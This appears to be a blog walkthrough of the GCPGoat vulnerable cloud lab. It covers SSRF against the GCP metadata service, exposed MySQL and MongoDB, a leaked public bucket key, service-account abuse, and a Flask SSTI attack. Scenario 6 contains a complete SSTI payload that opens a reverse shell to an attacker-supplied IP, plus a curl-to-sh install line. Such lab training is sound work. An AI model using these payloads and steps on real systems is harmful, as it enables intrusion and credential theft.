GCPgoat Scenarios

https://gcpgoat.joshuajebaraj.com/

Scenario-1 Attacking Compute Engine

./create-scenario-1.sh

Web Server: 35.194.173.109

2. Enumerating web server and finding ssrf-

a. This web app loads websites and shows http responses-

b. Intercept the http traffic in burp proxy and submit collaborator domain in url we got HTTP interaction from IP 35.194.173.109 validating the SSRF-

3. Exploiting SSRF-

Header- Metadata-Flavor: Google

Note: “Metadata-Flavor: Google” http header is required with ssrf request in GCP.

URL- http://169.254.169.254/computeMetadata/v1/?recursive=true&alt=text

We are able to fetch meta-data of the Compute-Engine

Scenario-2 Attacking SQL instance

./create-scenario2.sh apna-sql-instance

35.185.167.208

2. Connecting to publicly accessible mysql instance-

Note: This scenario assumes there was no authentication for the database, but in the real world may find some weak credentials

Scenario-3 Attacking Google Kubernetes Engine

./create-scenario3.sh

2. Scenario Info-

GKE allows the user to set up the Kubernetes environment without much hassle, By default, the application running in the pod are not exposed outside the world. To access the service outside the cluster there are 3 types of services can be use

  1. NodePort
  2. Loadbalancer
  3. Ingress

Sometimes the application exposed via Nodeport may contain sensitive information or services which meant to be used internally without authentication.

3. Finding out publicly exposed mongodb instance-

a. Type the below command the in the GCLOUD SHELL to find the IP of nodes

kubectl get nodes -o wide

b. Port scanning and service version scanning-

nmap -Pn --disable-arp-ping -vv -n -sS -T5 -p- 34.80.95.15 35.221.170.253 35.194.173.109
nmap -Pn --disable-arp-ping -vv -n -sS -T5 -p 22,3389,30003 34.80.95.15 35.221.170.253 35.194.173.109 -sV --version-all

Port 30003 seems interesting, Nmap is unable to determine the service running on this port.

c. Manually enumerating the port-

nc 34.80.95.15 30003

4. Connecting to MongoDB-

mongo --host 34.80.95.15:30003

Scenario-4 Attacking Google Cloud Storage

./create-scenario-4.sh gokuvsvegeta

2. Scenario info-

Public-Facing Google Bucket is the most common vulnerability in the GCP environment Users often create the bucket with public access in order to use the data stored in the bucket to be used by external applications, Sometimes this leads leakage of sensitive information

3. Bucket leaking sensitive information-

https://storage.googleapis.com/gcpgoat-366620/
https://storage.googleapis.com/gcpgoat-366620/service-key.json

Scenario-5 Privilege escalation Using a Service account

  1. Deployment
./create-scenario-5.sh

2. Scenario info-
Google Container Registry Allows storing our container Registry Google Container Registry uses Google Storage Bucket to store the image So anyone with admin access to the bucket can download the image.

3. Save the service-key.json and use it-

gcloud auth activate-service-account --key-file=service-key.json

3. Listing the containers stored in Google Container Registry-

gcloud container images list

gcr.io/gcpgoat-366620/secret

4. Running the container and reading secret-

docker run  --rm  -it  gcr.io/<project-name>/secret:v1 sh

secret- super-secret

Scenario-6 Privilege Escalation in Compute Engine

./create-scenario-6.sh

ssh into compute instance and run the below command to start web server-

curl https://raw.githubusercontent.com/JOSHUAJEBARAJ/hack/main/setup.sh | sh

2. Scenario info-

The default service account created with the VM Instance doesn’t follow the least privilege principle by default its ability to access the Google cloud bucket.

3. Accessing this web server via the public IP of compute instance-

http://35.194.173.109/

4. Enumerating web server-

a. Directory brute-forcing-

dirsearch -u http://35.194.173.109/

b. Upon visiting /page. We got http response code 500 internal server error in response-

c. Bruteforcing parameters using arjun -

name parameter found!

d. Visiting url with name GET parameter-

http://35.194.173.109/page?name=test

5. Testing name parameter for injection vulnerabilities-

a. Finding SSTI

Wappalyzer detects web app using flask framework.

SSTI payload is being executed!

http://35.194.173.109/page?name={{7*7}}

6. Exploiting SSTI to get rev shell-

Payload-

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c  'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<Your_ip>\",<Port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\");'").read().zfill(417)}}{%endif%}{% endfor %}

7. Listing buckets from compute instance(instance has permissions)-

gsutil ls

References-

https://gcpgoat.joshuajebaraj.com/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store